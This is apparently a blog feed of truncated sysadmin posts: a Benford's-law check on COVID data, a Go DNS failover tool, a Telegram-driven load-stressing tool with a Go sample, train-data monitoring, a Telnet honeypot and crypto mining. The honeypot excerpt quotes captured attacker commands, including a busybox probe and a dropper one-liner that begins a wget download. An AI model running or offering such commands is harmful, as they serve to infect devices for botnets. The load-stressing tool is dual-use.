Testing Benford's Law on COVID-19 Italian Datasets

Since COVID-19 has been the hottest topic of the year, I decided it might be a good idea to test my newly created Go experiment by checking Benford's law against public datasets.

So first of all, what is Benford's law? According to online resources, Benford's law (also called the first-digit law) states that the leading digits in a collection of datasets are probably going to be small. In a nutshell, if we have a dataset containing numbers, we will most likely find numbers starting with 1, 2, 3, 4 or 5, since these cover roughly 78% of the distribution (e.g. numbers starting with 1 appear about 30% of the time, with 2 about 18%, and so on).

The experiment

My little experiment starts with the COVID-19 dataset, to see whether those data can be considered Benford's law "compliant". The dataset is populated with COVID-19 cases on a daily basis, around 17:00-18:00 CET, by the Italian government's "Protezione Civile". If you are interested in this data you can find it here: - https://gith

Automatic failover using Interlock + CI/CD(s)

In the last few weeks, in the middle of the lockdown, I was bored and (re)started playing around with Go, since I was a bit rusty. My main goal was to automatically fail over all my static sites between GitHub and other public hosting providers, back and forth, in order to maintain an active DR plan whenever one of my providers goes offline because of connectivity issues or any other outage/maintenance. So before going into the blog post, here is a quick overview: You can also check it in the readme there: When I started writing the code, this time I forced myself to avoid the bad and ugly "exec shell" approach, in order to build a thinner Go Docker image (260 MiB). To spare you the whole read, I could sum up all the code in this sentence: "Interlock is a DNS failover and management tool based on Cloudflare APIs". Maybe I reinvented the wheel, because I could have used the (paid) built-in health check of C
Today I finally decided to open-source some of the code I created to reach my maximum level of laziness: automatically load-stressing web infrastructures via Telegram. The other challenge was to see/prove whether Go can be a replacement/alternative for Python scripting. Repo: Here is the diagram to better explain what I wanted to do: Disclaimer, before I even start: I'm not responsible for anything you do with this tool; it was made only for legitimate load-stressing/benchmarking of YOUR OWN infrastructure. I know that most of the code could be written more efficiently, so don't hate on my exec_shell(), ahah. End of disclaimer. The main "ingredients" are: Ansible, Go, Telegram, and at least one cloud provider with some resources. It all starts from the Telegram bot, which keeps listening for commands from the allowed "chat_id" configured; whenever a predefined command is sent, the bot (written in Go) runs the Ansible playbook with e
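The chat_id allowlist plus "command → playbook" dispatch can be sketched like this. It's a simplified stand-in for the real bot (the Telegram polling loop is left out); the chat ID, command name and playbook path are invented for illustration:

```go
package main

import (
	"fmt"
	"os/exec"
)

// allowed is the chat_id allowlist mentioned in the post; the ID
// here is a placeholder.
var allowed = map[int64]bool{123456789: true}

// handleCommand runs the Ansible playbook mapped to a bot command,
// but only for whitelisted chats. Command names and playbook paths
// are assumptions for illustration.
func handleCommand(chatID int64, command string) error {
	if !allowed[chatID] {
		return fmt.Errorf("chat %d is not authorized", chatID)
	}
	playbooks := map[string]string{
		"/loadtest": "playbooks/loadtest.yml",
	}
	playbook, ok := playbooks[command]
	if !ok {
		return fmt.Errorf("unknown command %q", command)
	}
	// The moral equivalent of the exec_shell() mentioned above.
	out, err := exec.Command("ansible-playbook", playbook).CombinedOutput()
	fmt.Println(string(out))
	return err
}

func main() {
	// An unauthorized chat is rejected before anything runs.
	if err := handleCommand(1, "/loadtest"); err != nil {
		fmt.Println("rejected:", err)
	}
}
```

Checking the allowlist before touching exec is the one piece worth copying verbatim: it keeps a public bot from running playbooks for strangers.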

Monitoring trains the sysadmin way

After discovering that the site kindly offers an API for its train data, I decided to implement my own monitoring system, to get a complete overview of what is happening in the public train system and never miss a train.

Master plan:
- Scrape all available data (train departures/arrivals, delays, stations...)
- Standardize the format so I can implement pluggable systems (Grafana, Telegram bot, website, Twitter...)
- At least have fun when I hear "We are sorry for the inconvenience" while I check my systems

Scraping all the relevant datasets

All the data is collected by a script every 30 minutes, using the site's APIs and station lists as input; the output is saved into InfluxDB (legit delay-time tracking with time-series DBs) and into a local folder for historical data that I will use later with git.

Standardize the format

To allow multiple systems to communicate with each other, you always need to take the raw data (train datasets) and standardize it into

Some (fun) stats from a running Telnet honeypot (YAFH)

Telnet sessions:

netstat -peanut | grep 23 | grep ESTABLISHED | wc -l
185

Total connections received last month:

grep CONNECTION yafh-telnet.log | wc -l
644

Most common wget/busybox attempt (don't run it... I implemented accidental copy-pasta protection here with a leading #):

#/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177';

Top 15 passwords used (the honeypot was designed to allow access with any password):

<empty>
1234
password
admin
12345
1234
Win1doW$
user
pass
aquario (??Really??)
admin
888888
7ujMko0admin
666666
5up
54321
1234567890
123456
1111
12345

One-liner of the year goes to:

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin wget;wget http://1

Setting up your first Mining rig on Ubuntu

A few months ago I started getting more and more interested in crypto, and now I can share my experience with mining. At the very beginning of mining, many were attracted to Bitcoin, since the difficulty was so low that everyone with some spare GPUs could start, be an active node of the Bitcoin network, and earn some satoshi (that was one of the reasons I started), but... Nowadays this is still a thing, but miners have evolved and investors came into the game with huge datacenters full of ASICs and 13-GPU rigs dedicated to mining a single coin, driving the difficulty to the very top and causing low-budget miners to shut off their rigs, since you cannot make any profit with just a bunch of GPUs. What happened next? Different coins started becoming profitable, allowing more GPU owners to jump into the mining game with other cryptocurrencies like Ethereum, Zcash, Ethereum Classic, Monero... and many others. If you ever noticed GPU prices this summer, you probably saw tha